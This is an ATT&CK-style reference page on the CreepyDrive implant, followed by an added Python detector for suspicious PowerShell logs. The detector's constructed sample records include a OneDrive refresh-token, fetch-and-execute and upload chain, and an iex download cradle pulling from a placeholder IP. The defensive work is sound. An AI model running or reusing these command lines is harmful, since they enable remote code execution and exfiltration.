S1023 CreepyDrive
CreepyDrive is a custom implant that has been used by POLONIUM since at least early 2022 for C2 through, and exfiltration to, actor-controlled OneDrive accounts.1
POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled Dropbox accounts.1
Item | Value |
---|---|
ID | S1023 |
Associated Names | |
Type | MALWARE |
Version | 1.0 |
Created | 07 July 2022 |
Last Modified | 10 August 2022 |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
enterprise | T1071 | Application Layer Protocol | - |
enterprise | T1071.001 | Web Protocols | CreepyDrive can use HTTPS for C2 through the Microsoft Graph API.1 |
enterprise | T1059 | Command and Scripting Interpreter | - |
enterprise | T1059.001 | PowerShell | CreepyDrive can use PowerShell for execution, including the cmdlets Invoke-WebRequest and Invoke-Expression.1 |
enterprise | T1005 | Data from Local System | CreepyDrive can upload files to C2 from victim machines.1 |
enterprise | T1567 | Exfiltration Over Web Service | - |
enterprise | T1567.002 | Exfiltration to Cloud Storage | CreepyDrive can use cloud services including OneDrive for data exfiltration.1 |
enterprise | T1083 | File and Directory Discovery | CreepyDrive can specify the local file path to upload files from.1 |
enterprise | T1105 | Ingress Tool Transfer | CreepyDrive can download files to the compromised host.1 |
enterprise | T1550 | Use Alternate Authentication Material | - |
enterprise | T1550.001 | Application Access Token | CreepyDrive can use legitimate OAuth refresh tokens to authenticate with OneDrive.1 |
enterprise | T1102 | Web Service | - |
enterprise | T1102.002 | Bidirectional Communication | CreepyDrive can use OneDrive for C2.1 |
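The rows above describe a recognisable chain: PowerShell obtains a Graph access token from a stored OAuth refresh token (T1550.001), reads and writes OneDrive file content over HTTPS to graph.microsoft.com (T1071.001, T1102.002, T1567.002), and runs what it fetched with Invoke-Expression (T1059.001). The following detection script is an added example written for this page; it is not CreepyDrive code, not MITRE content, and not a signature for the real sample. It scans PowerShell script block log records (Microsoft-Windows-PowerShell/Operational Event ID 4104) for that combination. The Microsoft token and Graph endpoint shapes are the public ones; the record layout, host names and sample scripts are constructed here for illustration.

```python
"""Added example: flag CreepyDrive-style PowerShell in script block logs.

Not the implant's code and not MITRE's. Only the public Microsoft endpoint
shapes are real; the event layout and every sample script are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# OAuth token endpoint (v1 or v2) of the Microsoft identity platform.
TOKEN_ENDPOINT = re.compile(
    r"login\.microsoftonline\.com/[^/\s'\"]+/oauth2/(?:v2\.0/)?token", re.I)
# grant_type=refresh_token, allowing for PowerShell hashtable spacing/quoting.
REFRESH_GRANT = re.compile(r"grant_type\W{0,5}refresh_token", re.I)
# OneDrive file content read/write via Graph: /me/drive/.../content.
GRAPH_DRIVE_CONTENT = re.compile(
    r"graph\.microsoft\.com/v1\.0/(?:me|users/[^/\s'\"]+)/drive[^\s'\"]*?/content", re.I)
# Web-client cmdlets and their aliases, and expression evaluation.
WEB_CLIENT = re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b", re.I)
EVAL = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I)


@dataclass
class ScriptBlockEvent:
    host: str
    event_id: int        # 4104 = PowerShell script block logging
    script_block: str


@dataclass
class Finding:
    host: str
    indicators: list[str]
    severity: str


def indicators_for(text: str) -> list[str]:
    """Return the behavioural indicators present in one script block."""
    found = []
    if TOKEN_ENDPOINT.search(text) and REFRESH_GRANT.search(text):
        found.append("oauth_refresh_token_grant")     # T1550.001
    if GRAPH_DRIVE_CONTENT.search(text):
        found.append("graph_onedrive_content")        # T1102.002 / T1567.002 / T1105
    if WEB_CLIENT.search(text) and EVAL.search(text):
        found.append("download_and_eval")             # T1059.001 download cradle
    return found


def severity(indicators: list[str]) -> str:
    # A refresh-token grant plus OneDrive traffic or eval is the distinctive pairing;
    # a bare download cradle is common commodity tradecraft and rates lower.
    if "oauth_refresh_token_grant" in indicators and len(indicators) >= 2:
        return "high"
    return "medium" if indicators else "none"


def scan(events: list[ScriptBlockEvent]) -> list[Finding]:
    findings = []
    for ev in events:
        if ev.event_id != 4104:          # only script block records carry the script text
            continue
        inds = indicators_for(ev.script_block)
        if inds:
            findings.append(Finding(ev.host, inds, severity(inds)))
    return findings


# Constructed sample records (hosts, scripts and the 198.51.100.23 address are made up).
SAMPLE_EVENTS = [
    # Benign admin lookup against Graph: web client, no eval, no drive content.
    ScriptBlockEvent("ws-admin-01", 4104,
        "$me = Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/me' -Headers $h; $me.displayName"),
    # Refresh token -> Graph token -> fetch task file from OneDrive -> iex -> upload results.
    ScriptBlockEvent("ws-fin-07", 4104, r"""
$body = @{ client_id = $cid; grant_type = 'refresh_token'; refresh_token = $rt; scope = 'https://graph.microsoft.com/.default' }
$tok = (Invoke-WebRequest -Method Post -Uri 'https://login.microsoftonline.com/common/oauth2/v2.0/token' -Body $body).Content | ConvertFrom-Json
$hdr = @{ Authorization = "Bearer $($tok.access_token)" }
$task = Invoke-WebRequest -Headers $hdr -Uri 'https://graph.microsoft.com/v1.0/me/drive/root:/cmds/task.txt:/content'
Invoke-Expression $task.Content
Invoke-WebRequest -Method Put -Headers $hdr -Uri 'https://graph.microsoft.com/v1.0/me/drive/root:/out/docs.zip:/content' -InFile 'C:\Users\Public\docs.zip'
"""),
    # Generic download cradle with aliases: worth a look, but not the OneDrive pattern.
    ScriptBlockEvent("ws-hr-02", 4104, "iex (iwr 'http://198.51.100.23/stage.ps1' -UseBasicParsing).Content"),
    # Wrong event ID: module logging record, skipped by scan().
    ScriptBlockEvent("ws-hr-02", 4103, "Invoke-Expression 'Get-Date'"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.host}: {', '.join(f.indicators)}")
```

The regexes are deliberately coarse: the point is the co-occurrence of a refresh-token grant, Graph drive content access and evaluation in one script block, not any single string. In production, pair this with a check that the process making the token request is not a browser or Office binary, and alert on the host, not the account, since the OneDrive account is the attacker's.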
Groups That Use This Software
ID | Name | References |
---|---|---|
G1005 | POLONIUM | 1 |